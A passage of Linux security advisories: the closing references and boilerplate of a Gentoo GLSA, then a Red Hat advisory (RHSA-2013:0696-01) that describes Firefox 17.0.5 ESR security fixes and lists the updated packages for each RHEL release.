http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0795 [ 50 ] CVE-2013-0796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0796 [ 51 ] CVE-2013-0797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0797 [ 52 ] CVE-2013-0799 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0799 [ 53 ] CVE-2013-0800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0800 [ 54 ] CVE-2013-0801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0801 [ 55 ] CVE-2013-1670 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1670 [ 56 ] CVE-2013-1671 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1671 [ 57 ] CVE-2013-1674 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1674 [ 58 ] CVE-2013-1675 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1675 [ 59 ] CVE-2013-1676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1676 [ 60 ] CVE-2013-1677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1677 [ 61 ] CVE-2013-1678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1678 [ 62 ] CVE-2013-1679 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1679 [ 63 ] CVE-2013-1680 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1680 [ 64 ] CVE-2013-1681 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1681 [ 65 ] CVE-2013-1682 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1682 [ 66 ] CVE-2013-1684 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1684 [ 67 ] CVE-2013-1687 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1687 [ 68 ] CVE-2013-1690 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1690 [ 69 ] CVE-2013-1692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1692 [ 70 ] CVE-2013-1693 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1693 [ 71 ] CVE-2013-1694 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1694 [ 72 ] CVE-2013-1697 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1697 [ 73 ] CVE-2013-1701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1701 [ 74 ] CVE-2013-1702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1702 [ 75 ] CVE-2013-1704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1704 [ 76 ] CVE-2013-1705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1705 [ 77 ] CVE-2013-1707 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1707 [ 78 ] CVE-2013-1708 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1708 [ 79 ] CVE-2013-1709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1709 [ 80 ] CVE-2013-1710 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1710 [ 81 ] CVE-2013-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1711 [ 82 ] CVE-2013-1712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1712 [ 83 ] CVE-2013-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1713 [ 84 ] CVE-2013-1714 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1714 [ 85 ] CVE-2013-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1717 [ 86 ] CVE-2013-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1718 [ 87 ] CVE-2013-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1719 [ 88 ] CVE-2013-1720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1720 [ 89 ] CVE-2013-1722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1722 [ 90 ] CVE-2013-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1723 [ 91 ] CVE-2013-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1724 [ 92 ] CVE-2013-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1725 [ 93 ] CVE-2013-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1726 [ 94 ] CVE-2013-1728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1728 [ 95 ] CVE-2013-1730 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1730 [ 96 ] CVE-2013-1732 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1732 [ 97 ] CVE-2013-1735 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1735 [ 98 ] CVE-2013-1736 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1736 [ 99 ] CVE-2013-1737 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1737 [ 100 ] CVE-2013-1738 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1738 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-23.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: firefox security update Advisory ID: RHSA-2013:0696-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0696.html Issue date: 2013-04-02 CVE Names: CVE-2013-0788 CVE-2013-0793 CVE-2013-0795 CVE-2013-0796 CVE-2013-0800 ===================================================================== 1. Summary: Updated firefox packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: Mozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox. Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0788) A flaw was found in the way Same Origin Wrappers were implemented in Firefox. (CVE-2013-0795) A flaw was found in the embedded WebGL library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. Note: This issue only affected systems using the Intel Mesa graphics drivers. (CVE-2013-0796) An out-of-bounds write flaw was found in the embedded Cairo library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0800) A flaw was found in the way Firefox handled the JavaScript history functions. A malicious site could cause a web page to be displayed that has a baseURI pointing to a different site, allowing cross-site scripting (XSS) and phishing attacks. (CVE-2013-0793) Red Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Olli Pettay, Jesse Ruderman, Boris Zbarsky, Christian Holler, Milan Sreckovic, Joe Drew, Cody Crews, miaubiz, Abhishek Arya, and Mariusz Mlynski as the original reporters of these issues. For technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 17.0.5 ESR. You can find a link to the Mozilla advisories in the References section of this erratum. All Firefox users should upgrade to these updated packages, which contain Firefox version 17.0.5 ESR, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 946927 - CVE-2013-0788 Mozilla: Miscellaneous memory safety hazards (rv:17.0.5) (MFSA 2013-30) 946929 - CVE-2013-0800 Mozilla: Out-of-bounds write in Cairo library (MFSA 2013-31) 946931 - CVE-2013-0796 Mozilla: WebGL crash with Mesa graphics driver on Linux (MFSA 2013-35) 946932 - CVE-2013-0795 Mozilla: Bypass of SOW protections allows cloning of protected nodes (MFSA 2013-36) 946935 - CVE-2013-0793 Mozilla: Cross-site scripting (XSS) using timed history navigations (MFSA 2013-38) 6. Package List: Red Hat Enterprise Linux Desktop (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/firefox-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/firefox-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/xulrunner-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/xulrunner-17.0.5-1.el5_9.src.rpm i386: firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm x86_64: firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.x86_64.rpm firefox-17.0.5-1.el5_9.x86_64.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.x86_64.rpm firefox-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.x86_64.rpm xulrunner-17.0.5-1.el5_9.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm RHEL Desktop Workstation (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/xulrunner-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/xulrunner-17.0.5-1.el5_9.src.rpm i386: xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm x86_64: xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.x86_64.rpm xulrunner-devel-17.0.5-1.el5_9.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/firefox-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/firefox-17.0.5-1.el5_9.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/xulrunner-17.0.5-1.el5_9.src.rpm i386: firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm ia64: firefox-17.0.5-1.el5_9.ia64.rpm firefox-17.0.5-1.el5_9.ia64.rpm firefox-debuginfo-17.0.5-1.el5_9.ia64.rpm firefox-debuginfo-17.0.5-1.el5_9.ia64.rpm xulrunner-17.0.5-1.el5_9.ia64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ia64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ia64.rpm xulrunner-devel-17.0.5-1.el5_9.ia64.rpm xulrunner-devel-17.0.5-1.el5_9.ia64.rpm ppc: firefox-17.0.5-1.el5_9.ppc.rpm firefox-17.0.5-1.el5_9.ppc.rpm firefox-debuginfo-17.0.5-1.el5_9.ppc.rpm firefox-debuginfo-17.0.5-1.el5_9.ppc.rpm xulrunner-17.0.5-1.el5_9.ppc.rpm xulrunner-17.0.5-1.el5_9.ppc64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ppc.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ppc.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ppc64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.ppc64.rpm xulrunner-devel-17.0.5-1.el5_9.ppc.rpm xulrunner-devel-17.0.5-1.el5_9.ppc64.rpm s390x: firefox-17.0.5-1.el5_9.s390.rpm firefox-17.0.5-1.el5_9.s390.rpm firefox-17.0.5-1.el5_9.s390x.rpm firefox-17.0.5-1.el5_9.s390x.rpm firefox-debuginfo-17.0.5-1.el5_9.s390.rpm firefox-debuginfo-17.0.5-1.el5_9.s390.rpm firefox-debuginfo-17.0.5-1.el5_9.s390x.rpm firefox-debuginfo-17.0.5-1.el5_9.s390x.rpm xulrunner-17.0.5-1.el5_9.s390.rpm xulrunner-17.0.5-1.el5_9.s390x.rpm xulrunner-debuginfo-17.0.5-1.el5_9.s390.rpm xulrunner-debuginfo-17.0.5-1.el5_9.s390.rpm xulrunner-debuginfo-17.0.5-1.el5_9.s390x.rpm xulrunner-debuginfo-17.0.5-1.el5_9.s390x.rpm xulrunner-devel-17.0.5-1.el5_9.s390.rpm xulrunner-devel-17.0.5-1.el5_9.s390x.rpm x86_64: firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.i386.rpm firefox-17.0.5-1.el5_9.x86_64.rpm firefox-17.0.5-1.el5_9.x86_64.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.i386.rpm firefox-debuginfo-17.0.5-1.el5_9.x86_64.rpm firefox-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-17.0.5-1.el5_9.i386.rpm xulrunner-17.0.5-1.el5_9.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.i386.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el5_9.x86_64.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.i386.rpm xulrunner-devel-17.0.5-1.el5_9.x86_64.rpm Red Hat Enterprise Linux Desktop (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm x86_64: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm x86_64: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm x86_64: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm ppc64: firefox-17.0.5-1.el6_4.ppc.rpm firefox-17.0.5-1.el6_4.ppc.rpm firefox-17.0.5-1.el6_4.ppc64.rpm firefox-17.0.5-1.el6_4.ppc64.rpm firefox-debuginfo-17.0.5-1.el6_4.ppc.rpm firefox-debuginfo-17.0.5-1.el6_4.ppc.rpm firefox-debuginfo-17.0.5-1.el6_4.ppc64.rpm firefox-debuginfo-17.0.5-1.el6_4.ppc64.rpm xulrunner-17.0.5-1.el6_4.ppc.rpm xulrunner-17.0.5-1.el6_4.ppc.rpm xulrunner-17.0.5-1.el6_4.ppc64.rpm xulrunner-17.0.5-1.el6_4.ppc64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc64.rpm s390x: firefox-17.0.5-1.el6_4.s390.rpm firefox-17.0.5-1.el6_4.s390.rpm firefox-17.0.5-1.el6_4.s390x.rpm firefox-17.0.5-1.el6_4.s390x.rpm firefox-debuginfo-17.0.5-1.el6_4.s390.rpm firefox-debuginfo-17.0.5-1.el6_4.s390.rpm firefox-debuginfo-17.0.5-1.el6_4.s390x.rpm firefox-debuginfo-17.0.5-1.el6_4.s390x.rpm xulrunner-17.0.5-1.el6_4.s390.rpm xulrunner-17.0.5-1.el6_4.s390.rpm xulrunner-17.0.5-1.el6_4.s390x.rpm xulrunner-17.0.5-1.el6_4.s390x.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390x.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390x.rpm x86_64: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm ppc64: xulrunner-debuginfo-17.0.5-1.el6_4.ppc.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.ppc64.rpm xulrunner-devel-17.0.5-1.el6_4.ppc.rpm xulrunner-devel-17.0.5-1.el6_4.ppc.rpm xulrunner-devel-17.0.5-1.el6_4.ppc64.rpm xulrunner-devel-17.0.5-1.el6_4.ppc64.rpm s390x: xulrunner-debuginfo-17.0.5-1.el6_4.s390.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390x.rpm xulrunner-debuginfo-17.0.5-1.el6_4.s390x.rpm xulrunner-devel-17.0.5-1.el6_4.s390.rpm xulrunner-devel-17.0.5-1.el6_4.s390.rpm xulrunner-devel-17.0.5-1.el6_4.s390x.rpm xulrunner-devel-17.0.5-1.el6_4.s390x.rpm x86_64: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/firefox-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm x86_64: firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.i686.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.i686.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm firefox-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.i686.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/xulrunner-17.0.5-1.el6_4.src.rpm i386: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm x86_64: xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.i686.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-debuginfo-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.i686.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm xulrunner-devel-17.0.5-1.el6_4.x86_64.rpm These packages are GPG signed by Red Hat for security. 